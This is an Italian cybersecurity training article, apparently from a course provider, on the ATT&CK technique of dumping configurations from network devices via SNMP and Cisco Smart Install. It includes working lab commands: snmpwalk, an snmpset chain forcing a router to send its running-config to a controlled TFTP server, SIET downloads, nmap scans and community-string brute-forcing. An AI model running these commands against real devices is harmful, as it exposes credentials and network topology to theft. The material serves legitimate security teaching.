Iscriviti al webinar gratuito del 12 Maggio per diventare Forensic Analyst! Scopri di più
Corso Ethical Hacker: accedi alla promozione fino al 30 Arile! Scopri di più
Quando un avversario riesce a estrarre il file di configurazione da un router, uno switch o un firewall, ottiene in un colpo solo la mappa completa della rete, le credenziali salvate in chiaro o con hash deboli, le ACL attive e ogni dettaglio sul software in esecuzione. La tecnica Network Device Configuration Dump si inserisce nella fase di Collection (TA0009), il momento in cui l'attaccante raccoglie informazioni utili a consolidare l'accesso o a preparare l'esfiltrazione.
I vettori principali sono due protocolli storici dell'ecosistema di rete: SNMP (Simple Network Management Protocol), che permette di interrogare OID specifici contenenti frammenti o intere configurazioni, e Smart Install (SMI), il protocollo Cisco progettato per il provisioning zero-touch che, se lasciato esposto, consente di scaricare la running-config senza alcuna autenticazione. A questi si aggiungono sessioni CLI via SSH/Telnet e API REST sempre più diffuse nei dispositivi moderni.
L'impatto è significativo: un singolo file di configurazione può contenere community string SNMP, chiavi pre-shared VPN, credenziali TACACS+ o RADIUS, e la topologia interna con indirizzi e VLAN. Le mitigazioni documentate sono 6, il che riflette la necessità di agire su più livelli — dalla crittografia al filtraggio di rete — per proteggere un asset troppo spesso trascurato dai programmi di hardening.
Il modo più immediato per testare questa superficie d'attacco è partire da SNMP. In laboratorio, configura un router con SNMPv2c e una community string debole (ad esempio public o private), poi lancia un'enumerazione con Net-SNMP (open source), il toolkit standard presente in quasi tutte le distribuzioni Linux:
snmpwalk -v2c -c public <IP_TARGET> 1.3.6.1.4.1.9.9.43.1.1
L'OID 1.3.6.1.4.1.9.9.43 corrisponde al ramo Cisco Configuration Management MIB. Se la community ha permessi di lettura/scrittura, puoi fare molto di più: forzare il dispositivo a esportare la configurazione via TFTP verso una macchina sotto il tuo controllo. L'operazione si esegue impostando una serie di OID via snmpset:
snmpset -v2c -c private <IP_TARGET> 1.3.6.1.4.1.9.9.96.1.1.1.1.2.<RANDOM_INDEX> i 1 1.3.6.1.4.1.9.9.96.1.1.1.1.3.<RANDOM_INDEX> i 4 1.3.6.1.4.1.9.9.96.1.1.1.1.4.<RANDOM_INDEX> i 1 1.3.6.1.4.1.9.9.96.1.1.1.1.5.<RANDOM_INDEX> a <IP_TFTP_SERVER> 1.3.6.1.4.1.9.9.96.1.1.1.1.6.<RANDOM_INDEX> s running-config 1.3.6.1.4.1.9.9.96.1.1.1.1.14.<RANDOM_INDEX> i 1
Questo comando istruisce il dispositivo Cisco a copiare la running-config sul tuo server TFTP. Avvia prima il listener con atftpd o tftpd-hpa (entrambi open source) sulla macchina ricevente.
Per il vettore Smart Install, lo strumento di riferimento è SIET — Smart Install Exploitation Tool (open source, disponibile su GitHub). Permette di identificare dispositivi con SMI attivo e di scaricare la configurazione:
python siet.py -g -i <IP_TARGET>
Il flag -g avvia il download della configurazione. Prima di procedere, verifica che il target esponga la porta TCP 4786 con un semplice scan Nmap:
nmap -p 4786 --script banner <IP_TARGET>
Nmap (open source) dispone anche di script NSE utili per l'enumerazione SNMP, come snmp-brute per il brute-force delle community string e snmp-interfaces per mappare le interfacce. Una catena d'attacco realistica in lab prevede tre fasi: enumerazione delle community con onesixtyone (open source), dump della configurazione via SNMP, analisi offline delle credenziali estratte con un editor di testo o con grep per individuare le righe contenenti password, secret o key.
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo